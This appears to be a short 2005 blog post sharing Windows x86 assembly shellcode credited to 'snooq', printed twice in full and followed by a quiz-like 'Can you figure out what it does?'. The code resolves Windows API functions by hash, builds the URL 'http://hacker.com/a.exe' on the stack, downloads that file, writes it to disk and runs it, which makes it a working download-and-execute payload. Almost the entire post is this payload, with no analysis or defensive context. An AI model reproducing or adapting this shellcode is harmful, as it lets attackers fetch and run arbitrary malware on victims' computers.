Some nice stuff
Courtesy of my friend snooq!
; Author : snooq [http://www.redpuffer.net/snooq/]
; Date : 12 August 2005
[BITS 32]
mov eax, [fs:0x30]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov esi, [eax + 0x08]
push esi ; kernel32.dll ; [ebp + 0x2c] -> a handy placeholder..
push 0xec0e4e8e ; LoadLibraryA ; [ebp + 0x28]
push 0x16b3fe72 ; CreateProcessA ; [ebp + 0x24]
push 0x60e0ceef ; ExitThread ; [ebp + 0x20]
push 0x7c0017a5 ; CreateFileA ; [ebp + 0x1c]
push 0xe80a791f ; WriteFile ; [ebp + 0x18]
push 0x0ffd97fb ; CloseHandle ; [ebp + 0x14]
push 0xb46984e7 ; HeapCreate ; [ebp + 0x10]
push 0x57e84429 ; InternetOpenA ; [ebp + 0x0c]
push 0x7e0fed49 ; InternetOpenUrlA ; [ebp + 0x08]
push 0x5fe34b8b ; InternetReadFile ; [ebp + 0x04]
push ebp
mov ebp, esp
push byte 0x0a ; # of functions to find
pop ecx
L1:
cmp cl, 0x03 ; to load wininet.dll
je Load_WININET
L2:
push dword [ebp + 0x2c]
push dword [ebp + ecx * 0x04]
call GetProcAdd
mov [ebp + ecx * 0x04], eax
loop L1
jmp short Download
Load_WININET:
push ecx
push 0x0074656e
push 0x696e6977 ; 'wininet'
push esp
call [ebp + 0x28] ; LoadLibraryA
mov [ebp + 0x2c], eax ; wininet.dll
pop ecx
pop ecx
pop ecx
jmp short L2
Download:
xor ebx, ebx
push ebx
push 0x00000065 ; 000e
push 0x78652e61 ; xe.a
push 0x2f6d6f63 ; /moc
push 0x2e72656b ; .rek
push 0x6361682f ; cah/
push 0x2f3a7074 ; /:pt
push 0x74680065 ; th e
push 0x78652e61 ; xe.a
dec ebx
shr ebx, 0x0e
push ebx
shr ebx, 0x01
push ebx
push byte 0x04
call [ebp + 0x10] ; HeapCreate()
mov [ebp + 0x30], eax ; [ebp + 0x30] -> heap handle
xor edx, edx
push edx
push edx
push edx
push edx
push edx
call [ebp + 0x0c] ; InternetOpenA()
mov [ebp + 0x34], eax
; [ebp-0x09] -> filename
; [ebp-0x1e] -> url
mov ecx, esp
add ecx, 0x06
push edx
push edx
push edx
push edx
push ecx
push dword [ebp + 0x34]
call [ebp + 0x08] ; InternetOpenUrlA()
mov [ebp + 0x34], eax ; [ebp + 0x34] -> HINTERNET
mov ecx, esp
xor edx, edx
push edx
push edx
push 0x02
push edx
push edx
push dword 0x40000000
push ecx
call [ebp + 0x1c] ; CreateFile()
mov [ebp + 0x38], eax ; [ebp + 0x38] -> file handle
mov ecx, ebp
add ecx, 0x3c ; [ebp + 0x3c] -> rlen
push ecx
push ebx
push dword [ebp + 0x30]
push dword [ebp + 0x34]
call [ebp + 0x04] ; InternetReadFile()
mov ecx, ebp
add ecx, 0x40 ; [ebp + 0x40] -> wlen
xor edx, edx
push edx
push ecx
push dword [ebp + 0x3c]
push dword [ebp + 0x30]
push dword [ebp + 0x38]
call [ebp + 0x18] ; WriteFile()
push dword [ebp + 0x38]
call [ebp + 0x14] ; CloseHandle()
mov edx, esp
sub esp, 0x54
lea edi, [esp]
xor eax, eax
push byte 0x15
pop ecx
rep stosd
mov byte [esp + 0x10], 0x44 ; SI.** = sizeof(si)
lea ebx, [esp + 0x10] ; SI
push esp ; PI
push ebx
push eax
push eax
push eax
push eax
push eax
push eax
push edx
push eax
call [ebp + 0x24] ; CreateProcessA()
call [ebp + 0x20] ; ExitThread()
; Function to retrive function address
; Parameters: function hash, dll base
; Return: function address
GetProcAdd:
push ecx
push esi
mov esi, [esp + 0x10] ; dll base
mov eax, [esi + 0x3c] ; PE header address
mov edx, [esi + eax + 0x78] ; Export table relative offset
add edx, esi ; Export table address
mov ecx, [edx + 0x18] ; Number of names
mov ebx, [edx + 0x20] ; Names table relative offset
add ebx, esi ; Names table address
Find:
jecxz Done
dec ecx
mov esi, [ebx + ecx * 0x04] ; Relative offset of the name
add esi, [esp + 0x10] ; ptr to current name
xor edi, edi
xor eax, eax
cld
Hash:
lodsb ; Load the next byte from esi into al
test al, al ; Test ourselves.
jz Compare ; If the ZF is set, we've hit the null term.
ror edi, 0xd ; Rotate edi 13 bits to the right
add edi, eax ; Add the new byte to the accumulator
jmp short Hash ; Next iteration
Compare:
cmp edi, [esp + 0x0c] ; Compare 2 hashes
jnz Find
mov ebx, [edx + 0x24] ; Ordinals table relative offset
add ebx, [esp + 0x10] ; Ordinals table address
mov cx, [ebx + ecx * 0x02] ; Extrapolate the function's ordinal
mov ebx, [edx + 0x1c] ; Address table relative offset
add ebx, [esp + 0x10] ; Address table address
mov eax, [ebx + ecx * 0x04] ; Extract the relative function offset from its ordinal
add eax, [esp + 0x10] ; Function address
Done:
pop esi
pop ecx
ret 0x08
nop
nop
nop
nop
nop
nop
nop
nop
Can you figure out what it does? :)
; Author : snooq [http://www.redpuffer.net/snooq/]
; Date : 12 August 2005
[BITS 32]
mov eax, [fs:0x30]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov esi, [eax + 0x08]
push esi ; kernel32.dll ; [ebp + 0x2c] -> a handy placeholder..
push 0xec0e4e8e ; LoadLibraryA ; [ebp + 0x28]
push 0x16b3fe72 ; CreateProcessA ; [ebp + 0x24]
push 0x60e0ceef ; ExitThread ; [ebp + 0x20]
push 0x7c0017a5 ; CreateFileA ; [ebp + 0x1c]
push 0xe80a791f ; WriteFile ; [ebp + 0x18]
push 0x0ffd97fb ; CloseHandle ; [ebp + 0x14]
push 0xb46984e7 ; HeapCreate ; [ebp + 0x10]
push 0x57e84429 ; InternetOpenA ; [ebp + 0x0c]
push 0x7e0fed49 ; InternetOpenUrlA ; [ebp + 0x08]
push 0x5fe34b8b ; InternetReadFile ; [ebp + 0x04]
push ebp
mov ebp, esp
push byte 0x0a ; # of functions to find
pop ecx
L1:
cmp cl, 0x03 ; to load wininet.dll
je Load_WININET
L2:
push dword [ebp + 0x2c]
push dword [ebp + ecx * 0x04]
call GetProcAdd
mov [ebp + ecx * 0x04], eax
loop L1
jmp short Download
Load_WININET:
push ecx
push 0x0074656e
push 0x696e6977 ; 'wininet'
push esp
call [ebp + 0x28] ; LoadLibraryA
mov [ebp + 0x2c], eax ; wininet.dll
pop ecx
pop ecx
pop ecx
jmp short L2
Download:
xor ebx, ebx
push ebx
push 0x00000065 ; 000e
push 0x78652e61 ; xe.a
push 0x2f6d6f63 ; /moc
push 0x2e72656b ; .rek
push 0x6361682f ; cah/
push 0x2f3a7074 ; /:pt
push 0x74680065 ; th e
push 0x78652e61 ; xe.a
dec ebx
shr ebx, 0x0e
push ebx
shr ebx, 0x01
push ebx
push byte 0x04
call [ebp + 0x10] ; HeapCreate()
mov [ebp + 0x30], eax ; [ebp + 0x30] -> heap handle
xor edx, edx
push edx
push edx
push edx
push edx
push edx
call [ebp + 0x0c] ; InternetOpenA()
mov [ebp + 0x34], eax
; [ebp-0x09] -> filename
; [ebp-0x1e] -> url
mov ecx, esp
add ecx, 0x06
push edx
push edx
push edx
push edx
push ecx
push dword [ebp + 0x34]
call [ebp + 0x08] ; InternetOpenUrlA()
mov [ebp + 0x34], eax ; [ebp + 0x34] -> HINTERNET
mov ecx, esp
xor edx, edx
push edx
push edx
push 0x02
push edx
push edx
push dword 0x40000000
push ecx
call [ebp + 0x1c] ; CreateFile()
mov [ebp + 0x38], eax ; [ebp + 0x38] -> file handle
mov ecx, ebp
add ecx, 0x3c ; [ebp + 0x3c] -> rlen
push ecx
push ebx
push dword [ebp + 0x30]
push dword [ebp + 0x34]
call [ebp + 0x04] ; InternetReadFile()
mov ecx, ebp
add ecx, 0x40 ; [ebp + 0x40] -> wlen
xor edx, edx
push edx
push ecx
push dword [ebp + 0x3c]
push dword [ebp + 0x30]
push dword [ebp + 0x38]
call [ebp + 0x18] ; WriteFile()
push dword [ebp + 0x38]
call [ebp + 0x14] ; CloseHandle()
mov edx, esp
sub esp, 0x54
lea edi, [esp]
xor eax, eax
push byte 0x15
pop ecx
rep stosd
mov byte [esp + 0x10], 0x44 ; SI.** = sizeof(si)
lea ebx, [esp + 0x10] ; SI
push esp ; PI
push ebx
push eax
push eax
push eax
push eax
push eax
push eax
push edx
push eax
call [ebp + 0x24] ; CreateProcessA()
call [ebp + 0x20] ; ExitThread()
; Function to retrive function address
; Parameters: function hash, dll base
; Return: function address
GetProcAdd:
push ecx
push esi
mov esi, [esp + 0x10] ; dll base
mov eax, [esi + 0x3c] ; PE header address
mov edx, [esi + eax + 0x78] ; Export table relative offset
add edx, esi ; Export table address
mov ecx, [edx + 0x18] ; Number of names
mov ebx, [edx + 0x20] ; Names table relative offset
add ebx, esi ; Names table address
Find:
jecxz Done
dec ecx
mov esi, [ebx + ecx * 0x04] ; Relative offset of the name
add esi, [esp + 0x10] ; ptr to current name
xor edi, edi
xor eax, eax
cld
Hash:
lodsb ; Load the next byte from esi into al
test al, al ; Test ourselves.
jz Compare ; If the ZF is set, we've hit the null term.
ror edi, 0xd ; Rotate edi 13 bits to the right
add edi, eax ; Add the new byte to the accumulator
jmp short Hash ; Next iteration
Compare:
cmp edi, [esp + 0x0c] ; Compare 2 hashes
jnz Find
mov ebx, [edx + 0x24] ; Ordinals table relative offset
add ebx, [esp + 0x10] ; Ordinals table address
mov cx, [ebx + ecx * 0x02] ; Extrapolate the function's ordinal
mov ebx, [edx + 0x1c] ; Address table relative offset
add ebx, [esp + 0x10] ; Address table address
mov eax, [ebx + ecx * 0x04] ; Extract the relative function offset from its ordinal
add eax, [esp + 0x10] ; Function address
Done:
pop esi
pop ecx
ret 0x08
nop
nop
nop
nop
nop
nop
nop
nop
Can you figure out what it does? :)
posted by Beng Hacks at 6:50 PM
0 Comments:
Post a Comment
<< Home